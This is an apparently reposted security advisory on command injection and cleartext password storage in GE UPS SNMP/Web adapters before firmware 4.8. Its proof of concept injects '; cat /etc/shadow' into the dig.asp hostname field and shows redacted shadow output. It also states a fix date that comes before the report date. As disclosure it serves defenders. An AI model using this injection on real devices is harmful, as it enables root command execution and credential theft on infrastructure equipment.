GE Industrial Solutions UPS SNMP Adapter Command Injection

2016.02.04
Credit: Karn Ganeshen
Risk: High
Local: No
Remote: Yes
CVE: CVE-2016-0861 | CVE-2016-0862
CWE: CWE-78

GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Storage of Sensitive Information Vulnerabilities *Timelines:* Reported to ICS-CERT on: July 06, 2015 Fix & Advisory Released by GE: January 25, 2015 Vulnerability ID: GEIS16-01 *GE Advisory: * http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf <http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical%7CGEIS_SNMP%7CPDF&filename=GEIS_SNMP.pdf> *ICS-CERT Advisory:*In Progress *About GE* GE is a US-based company that maintains offices in several countries around the world. The affected product, SNMP/Web Interface adapter, is a web server designed to present information about the Uninterruptible Power Supply (UPS). According to GE, the SNMP/Web Interface is deployed across several sectors including Critical Manufacturing and Energy. GE estimates that these products are used worldwide. *Affected Products* ? All SNMP/Web Interface cards with firmware version prior to 4.8 manufactured by GE Industrial Solutions. *CVE-IDs:* CVE-2016-0861 CVE-2016-0862 *VULNERABILITY OVERVIEW* A *COMMAND INJECTIONCVE-2016-0861* Device application services run as (root) privileged user, and does not perform strict input validation. This allows an authenticated user to execute any system commands on the system. Vulnerable function: http://IP/dig.asp <http://ip/dig.asp> Vulnerable parameter: Hostname/IP address *PoC:* In the Hostname/IP address input, enter: ; cat /etc/shadow Output root:<hash>:0:0:root:/root:/bin/sh <...other system users...> ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh B *CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862* File contains sensitive account information stored in cleartext. All users, including non-admins, can view/access device's configuration, via Menu option -> Save -> Settings. The application stores all information in clear-text, including *all user logins and clear-text passwords*. +++++ I sent it out on Jan 29 but for some reason, it was not posted to FD. So sending it again. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top